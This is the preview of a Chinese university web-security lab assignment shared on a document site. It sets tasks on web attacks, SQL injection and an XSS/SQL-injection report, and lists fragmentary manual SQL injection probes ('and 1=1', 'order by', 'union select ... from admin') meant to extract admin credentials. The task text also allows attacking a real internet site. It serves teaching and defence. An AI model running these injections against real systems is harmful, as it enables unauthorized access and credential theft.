注入的具体实现以及跨站脚本攻击WEB安全攻防技术实践Word文档格式.docx
《注入的具体实现以及跨站脚本攻击WEB安全攻防技术实践Word文档格式.docx》由会员分享,可在线阅读,更多相关《注入的具体实现以及跨站脚本攻击WEB安全攻防技术实践Word文档格式.docx(18页珍藏版)》请在冰豆网上搜索。
一、任务清单:
任务1:
针对某一站点实施WEB攻击。
任务要求:
1)目标不限,可选择互联网某一真实站点,也可在自建的环境下实施;
注意,如是自建环境,需要提供环境建设说明及配套工具软件,并保留虚拟机环境。
2)选取工具不限,攻击方式不限,请结合攻击实际需要进行;
3)攻击过程中,如检测出可利用的漏洞,应给出测试用例,并分析漏洞存在的原因,结合攻击过程,给出可行解决方案;
4)应记录全部攻击操作过程、记录攻击结果及现象,形成详细攻击分析报告;
5)记录详细过程形成项目报告,重要步骤要有截图配详细说明。
任务2:
自设情景,实现SQL注入攻击。
2)要求分别实现工具注入和手工注入,两种方式独立进行;
3)应记录全部攻击操作过程、记录攻击结果及现象,形成详细攻击分析报告;
4)记录详细过程形成项目报告,重要步骤要有截图配详细说明。
and1=1
and2=2
andexists(selectcount(*)fromadmin)>
0
andexists(selectcount(username)fromadmin)>
andexists(selectcount(password)admin)>
orderby20
orderby10
orderby11
orderby12
unionselect1,2,3,4,5,6,7,8,9,10,11fromadmin
将2换成username:
将4位置换成pwd:
任务3:
撰写报告,阐明XSS跨站脚本攻击和SQL注入攻击的原理、表现特征(危害及可能造成的结果)、防御策略方案。
格式规范、叙述完整、语言通顺,方案可行;
不少于1500字。
如图即成功不需要密码登入后台
二、任务要求:
1、本次任务要求详见任务清单;
2、不限制各个任务所利用的工具及完成方式,尽可能多样化。
3、将上述任务全部实现后,以小组为单位写出项目综合报告。
4、报告中各部分内容对其关键操作过程和操作结果要进行截图,截图应能清楚显示各项的执行过程和命令使用情况,并结合截图有逐步文字清晰说明。
5、小组综合项目报告中要列出各成员工作分工及贡献。
三、考核形式:
1、组长组内工作评语及打分;
2、教师综合打分;
3、教师在评阅综合报告后,在各组内根据其分工以随机抽查的形式检验部分成员实际操作。